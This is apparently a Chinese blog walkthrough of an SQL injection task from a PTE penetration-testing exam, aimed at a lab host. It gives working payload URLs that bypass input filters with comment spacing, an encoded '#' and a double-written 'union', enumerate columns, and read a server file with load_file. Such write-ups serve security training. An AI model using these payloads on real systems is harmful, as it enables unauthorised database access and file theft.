PTE考试解析

Pte 考试题目

  1. 注入漏洞

空格被过滤

7969ca3861904d8fb01be06ce65abb0d.png

用/**/代替空格,发现#被过滤

569839e071f14312aac40977ddfe60b9.png

对#进行url编码为%23

87117733b39b4689b827eca82c12c231.png

输入构造好的payload

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=1%23

7f435ce13af847309671d78c9e23181d.png

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=2%23

68fe4a03cf9b4d39a2536b765ceb031b.png

输入order by 1  显示正常

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/order/**/by/**/1%23

a96847e65e3844e3b94debff6ee39caf.png

输入order by 2  显示正常

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/order/**/by/**/2%23

7aac062200cf4746841232eed4b2bd53.png

输入order by 3  显示正常

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/order/**/by/**/3%23

45ab7b7f140340d0a55fcde90a27e506.png

输入order by 4  显示正常

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/order/**/by/**/4%23

6c135326e5d845a2869812ddde059840.png

输入order by 5  出现错误,说明字段只存在4

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/order/**/by/**/5%23

0485062dd0574e8abb3074f8811528dd.png

输入union select 1,2,3,4  union被过滤采用双写绕过

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/union/**/select/**/1,2,3,4%23

f5e13f938c944beb908bea92fe94dd73.png

union被过滤采用双写绕过  没有显示出来字段号

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/ununionion/**/select/**/1,2,3,4%23

db344c640d644a46a252856c3958e297.png

采用and 和 or 测试

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=2/**/ununionion/**/select/**/1,2,3,4%23

2.3.4有显示

d7417f6e489445419cb4ae8657b0b49d.png

 

读文件使用load_file根据提示读取这个文件load_file(%27/tmp/360/key%27),进行尝试

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=2/**/ununionion/**/select/**/1,load_file(%27/tmp/360/key%27),3,4%23


92f5fa155ae542d89405909a61e2d925.pnghttp://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=2/**/ununionion/**/select/**/1,2,load_file(%27/tmp/360/key%27),4%23

38bbf39130354c07b11964d3017f1842.png

http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)/**/and/**/1=2/**/ununionion/**/select/**/1,2,3,load_file(%27/tmp/360/key%27)%23

34b9a05586ee403d8b1e0d6460ca9a71.png

 

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值